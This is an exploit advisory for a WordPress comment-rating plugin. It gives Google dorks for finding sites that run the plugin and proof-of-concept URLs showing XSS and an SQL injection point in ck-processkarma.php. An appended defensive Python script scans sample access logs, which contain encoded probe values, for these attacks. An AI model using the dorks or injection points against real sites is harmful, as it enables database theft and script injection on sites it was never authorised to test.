# Exploit Title: Wordpress comment rating plugin multiple Vulnerabilities
# Google Dork: 1- inurl:"/wp-content/plugins/comment-rating/"
#              2- inurl:"/ck-processkarma.php?id="
# Date: 2/1/2012
# Author: The Evil Thinker
# Contact : Enstene156@hotmail.fr
# Software Link: www.wordpress.com
# Vulnerable plugin: Comment rating plugin
# Tested on: Linux

Details :
---------
The vulnerable file is "ck-processkarma.php". The script does not filter its input parameters: "id" is used unsanitized in SQL, and "path" is reflected without encoding (XSS).

PoC 1 (XSS) :
http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=&imgIndex=

PoC 2 (SQL injection) :
http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]*****Inject_me_From_Here*****&action=add&path=TheMilkeyWay.exe/wp-content/plugins/comment-rating/&imgIndex=

-------------------------------------------------------------------------------------------
Special Greetz : Zack (DBA-HACKER) , Siper-N , Root-Mar , Anash , H!ch4m , Dr.Unknown , Mario-Gomez , BiiF0 , o Bla mantawel LLista
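As an added defensive example (not part of the advisory or the plugin): a small Python scanner over constructed web-server access-log lines that flags requests to ck-processkarma.php whose "id" is not an integer or whose "path" contains characters a plain directory path would never have, the two conditions the advisory describes. The log lines, the expected-safe path character set and the combined-log regex are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [02/Jan/2012:10:00:01 +0000] "GET /wp-content/plugins/comment-rating/ck-processkarma.php?id=42&action=add&path=&imgIndex= HTTP/1.1" 200 51
203.0.113.7 - - [02/Jan/2012:10:00:02 +0000] "GET /wp-content/plugins/comment-rating/ck-processkarma.php?id=42%27&action=add&path=&imgIndex= HTTP/1.1" 200 51
203.0.113.9 - - [02/Jan/2012:10:00:03 +0000] "GET /wp-content/plugins/comment-rating/ck-processkarma.php?id=42&action=add&path=%3Cscript%3E&imgIndex= HTTP/1.1" 200 51
203.0.113.11 - - [02/Jan/2012:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 1200
"""

# Minimal combined-log-format matcher (assumed layout; adjust for your server).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d+)'
)
TARGET = "/wp-content/plugins/comment-rating/ck-processkarma.php"
# "path" is reflected into the response; a legitimate value is only ever a plain
# relative directory path, so anything outside this set is suspicious (assumption).
SAFE_PATH_RE = re.compile(r'^[A-Za-z0-9._/-]*$')


def classify_request(url):
    """Return a list of findings for one request URL; empty means it looks benign."""
    parts = urlsplit(url)
    if parts.path != TARGET:
        return []
    # parse_qs percent-decodes values, so encoded quotes and brackets are seen as-is.
    qs = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for value in qs.get("id", []):
        if not value.isdigit():
            findings.append("non-integer id (possible SQL injection probe)")
    for value in qs.get("path", []):
        if not SAFE_PATH_RE.match(value):
            findings.append("unexpected characters in path (possible XSS probe)")
    return findings


def scan_log(text):
    """Return (ip, url, findings) for each suspicious request in the log text."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m.group("url"))
        if findings:
            hits.append((m.group("ip"), m.group("url"), findings))
    return hits


if __name__ == "__main__":
    for ip, url, findings in scan_log(SAMPLE_LOG):
        print(ip, url, "; ".join(findings))
```

Because the check decodes the query string before inspecting it, percent-encoded variants of the same probe are caught the same way as plain ones; a real deployment would also want to alert on the plugin being present at all until it is removed or patched.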